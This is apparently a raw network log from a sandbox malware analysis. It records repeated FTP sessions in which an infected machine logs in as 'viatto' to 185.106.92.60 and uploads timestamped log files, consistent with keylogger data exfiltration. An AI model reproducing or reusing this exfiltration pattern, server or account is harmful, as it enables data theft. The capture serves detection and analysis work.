                                                                                                                                    Oct 10, 2022 06:02:46.165358067 CEST4982921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:46.188299894 CEST2149829185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:46.188714027 CEST4982921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:46.212045908 CEST2149829185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:46.212567091 CEST4982921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:46.235399961 CEST2149829185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:46.237433910 CEST4982921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:46.261279106 CEST2149829185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,71)
                                                                                                                                    Oct 10, 2022 06:02:46.285289049 CEST4982921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.04.txt
                                                                                                                                    Oct 10, 2022 06:02:46.309276104 CEST2149829185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:46.338699102 CEST2149829185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:46.524415016 CEST2149831185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:46.524732113 CEST2149831185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:46.524904013 CEST2149831185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:46.525048971 CEST4983121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:46.547904015 CEST2149831185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:46.548218966 CEST4983121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:46.571221113 CEST2149831185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:46.571521997 CEST4983121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:46.594746113 CEST2149831185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:46.596035957 CEST4983121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:46.619544983 CEST2149831185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:46.628968954 CEST4983121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:46.652333021 CEST2149831185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:46.654973984 CEST4983121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:46.678620100 CEST2149831185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,72)
                                                                                                                                    Oct 10, 2022 06:02:46.704598904 CEST4983121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.05.txt
                                                                                                                                    Oct 10, 2022 06:02:46.728056908 CEST2149831185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:46.752537966 CEST2149831185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:47.043735027 CEST2149833185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:47.043795109 CEST2149833185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:47.043828964 CEST2149833185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:47.184973955 CEST4983321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:47.207954884 CEST2149833185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:47.239608049 CEST4983321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:47.262922049 CEST2149833185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:47.307113886 CEST4983321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:47.330303907 CEST2149833185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:47.367686987 CEST4983321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:47.391416073 CEST2149833185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:47.393978119 CEST4983321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:47.416878939 CEST2149833185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:47.474813938 CEST4983321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:47.499396086 CEST2149833185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,73)
                                                                                                                                    Oct 10, 2022 06:02:47.524908066 CEST4983321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.06.txt
                                                                                                                                    Oct 10, 2022 06:02:47.548566103 CEST2149833185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:47.612763882 CEST2149833185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:47.973403931 CEST2149835185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:47.973604918 CEST2149835185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:47.973946095 CEST2149835185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:48.397860050 CEST4983521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:48.424861908 CEST2149835185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:48.432049990 CEST4983521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:48.457561970 CEST2149835185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:48.457820892 CEST4983521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:48.481647015 CEST2149835185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:48.485728979 CEST4983521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:48.509646893 CEST2149835185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:48.548249960 CEST4983521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:48.574343920 CEST2149835185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:48.575366020 CEST4983521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:48.601413012 CEST2149835185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,75)
                                                                                                                                    Oct 10, 2022 06:02:48.663949966 CEST4983521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.07.txt
                                                                                                                                    Oct 10, 2022 06:02:48.688281059 CEST2149835185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:48.714183092 CEST2149835185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:51.957046032 CEST2149837185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:51.957101107 CEST2149837185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:51.957119942 CEST2149837185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:51.957819939 CEST4983721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:51.982935905 CEST2149837185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:51.988193035 CEST4983721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:52.012938023 CEST2149837185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:52.017467976 CEST4983721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:52.042597055 CEST2149837185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:52.046021938 CEST4983721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:52.071162939 CEST2149837185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:52.075490952 CEST4983721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:52.126398087 CEST2149837185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:52.127965927 CEST4983721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:52.153130054 CEST2149837185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,77)
                                                                                                                                    Oct 10, 2022 06:02:52.178929090 CEST4983721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.08.txt
                                                                                                                                    Oct 10, 2022 06:02:52.203645945 CEST2149837185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:52.234105110 CEST2149837185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:52.411364079 CEST2149839185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:52.411391973 CEST2149839185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:52.411405087 CEST2149839185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:52.419194937 CEST4983921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:52.441860914 CEST2149839185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:52.442368031 CEST4983921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:52.464889050 CEST2149839185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:52.470108986 CEST4983921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:52.492786884 CEST2149839185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:52.494193077 CEST4983921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:52.517066002 CEST2149839185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:52.519622087 CEST4983921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:52.542170048 CEST2149839185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:52.543791056 CEST4983921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:52.566807032 CEST2149839185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,78)
                                                                                                                                    Oct 10, 2022 06:02:52.593789101 CEST4983921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.09.txt
                                                                                                                                    Oct 10, 2022 06:02:52.618432045 CEST2149839185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:52.651597023 CEST2149839185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:52.831484079 CEST2149841185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:52.831655979 CEST2149841185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:52.832030058 CEST2149841185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:52.832232952 CEST4984121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:52.855437994 CEST2149841185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:52.856302977 CEST4984121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:52.878905058 CEST2149841185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:52.879194021 CEST4984121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:52.901838064 CEST2149841185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:52.902280092 CEST4984121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:52.925180912 CEST2149841185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:52.926002979 CEST4984121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:52.949115038 CEST2149841185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:52.951880932 CEST4984121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:52.975157022 CEST2149841185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,79)
                                                                                                                                    Oct 10, 2022 06:02:52.999691010 CEST4984121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.10.txt
                                                                                                                                    Oct 10, 2022 06:02:53.023708105 CEST2149841185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:53.049019098 CEST2149841185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:53.258516073 CEST2149843185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:53.258703947 CEST2149843185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:53.258958101 CEST2149843185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:53.259141922 CEST4984321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:53.284348011 CEST2149843185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:53.284671068 CEST4984321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:53.309365034 CEST2149843185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:53.309819937 CEST4984321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:53.333592892 CEST2149843185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:53.334072113 CEST4984321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:53.358297110 CEST2149843185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:53.359260082 CEST4984321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:53.383930922 CEST2149843185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:53.385252953 CEST4984321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:53.411017895 CEST2149843185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,80)
                                                                                                                                    Oct 10, 2022 06:02:53.436043024 CEST4984321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.11.txt
                                                                                                                                    Oct 10, 2022 06:02:53.461563110 CEST2149843185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:53.487135887 CEST2149843185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:53.695180893 CEST2149845185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:53.695241928 CEST2149845185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:53.695415020 CEST2149845185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:53.695837975 CEST4984521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:53.722632885 CEST2149845185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:53.722963095 CEST4984521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:53.750181913 CEST2149845185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:53.750776052 CEST4984521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:53.777276039 CEST2149845185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:53.777692080 CEST4984521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:53.804898024 CEST2149845185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:53.805908918 CEST4984521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:53.831756115 CEST2149845185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:53.834012032 CEST4984521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:53.860450029 CEST2149845185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,82)
                                                                                                                                    Oct 10, 2022 06:02:53.884397030 CEST4984521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.12.txt
                                                                                                                                    Oct 10, 2022 06:02:53.912930965 CEST2149845185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:53.940447092 CEST2149845185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:54.148822069 CEST2149847185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:54.148866892 CEST2149847185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:54.148905039 CEST2149847185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:54.149152040 CEST4984721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:54.172171116 CEST2149847185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:54.172590017 CEST4984721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:54.195616007 CEST2149847185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:54.196108103 CEST4984721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:54.219247103 CEST2149847185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:54.219734907 CEST4984721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:54.243223906 CEST2149847185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:54.244350910 CEST4984721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:54.267815113 CEST2149847185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:54.273618937 CEST4984721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:54.297326088 CEST2149847185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,83)
                                                                                                                                    Oct 10, 2022 06:02:54.320856094 CEST4984721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.13.txt
                                                                                                                                    Oct 10, 2022 06:02:54.344846010 CEST2149847185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:54.369050026 CEST2149847185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:54.568092108 CEST2149849185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:54.568119049 CEST2149849185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:54.568265915 CEST2149849185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:54.569969893 CEST4984921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:54.593153954 CEST2149849185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:54.593393087 CEST4984921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:54.616589069 CEST2149849185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:54.617088079 CEST4984921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:54.640192986 CEST2149849185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:54.641040087 CEST4984921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:54.664263964 CEST2149849185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:54.664863110 CEST4984921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:54.689058065 CEST2149849185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:54.692949057 CEST4984921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:54.716666937 CEST2149849185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,84)
                                                                                                                                    Oct 10, 2022 06:02:54.740814924 CEST4984921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.14.txt
                                                                                                                                    Oct 10, 2022 06:02:54.765811920 CEST2149849185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:54.794722080 CEST2149849185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:55.010014057 CEST2149851185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:55.010243893 CEST2149851185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:55.010505915 CEST2149851185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:55.010693073 CEST4985121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:55.036758900 CEST2149851185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:55.037312031 CEST4985121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:55.063865900 CEST2149851185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:55.066184998 CEST4985121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:55.092276096 CEST2149851185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:55.092596054 CEST4985121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:55.119882107 CEST2149851185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:55.128556967 CEST4985121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:55.157921076 CEST2149851185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:55.159230947 CEST4985121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:55.185045004 CEST2149851185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,85)
                                                                                                                                    Oct 10, 2022 06:02:55.212851048 CEST4985121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.15.txt
                                                                                                                                    Oct 10, 2022 06:02:55.239355087 CEST2149851185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:55.269659996 CEST2149851185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:55.473628998 CEST2149853185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:55.473674059 CEST2149853185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:55.473705053 CEST2149853185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:55.473948956 CEST4985321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:55.497308969 CEST2149853185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:55.497709036 CEST4985321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:55.520936012 CEST2149853185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:55.521445036 CEST4985321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:55.544470072 CEST2149853185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:55.546399117 CEST4985321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:55.570151091 CEST2149853185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:55.581579924 CEST4985321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:55.604881048 CEST2149853185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:55.606050014 CEST4985321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:55.629812956 CEST2149853185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,87)
                                                                                                                                    Oct 10, 2022 06:02:55.653860092 CEST4985321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.16.txt
                                                                                                                                    Oct 10, 2022 06:02:55.677217007 CEST2149853185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:55.701322079 CEST2149853185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:55.880469084 CEST2149855185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:55.880553007 CEST2149855185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:55.881042004 CEST2149855185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:55.881218910 CEST4985521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:55.904349089 CEST2149855185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:55.904577971 CEST4985521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:55.927581072 CEST2149855185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:55.927820921 CEST4985521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:55.950773954 CEST2149855185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:55.951081038 CEST4985521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:55.974683046 CEST2149855185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:55.975229025 CEST4985521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:55.998334885 CEST2149855185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:56.003174067 CEST4985521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:56.027060032 CEST2149855185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,88)
                                                                                                                                    Oct 10, 2022 06:02:56.051799059 CEST4985521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.17.txt
                                                                                                                                    Oct 10, 2022 06:02:56.076025963 CEST2149855185.106.92.60192.168.2.3150 Connection accepted
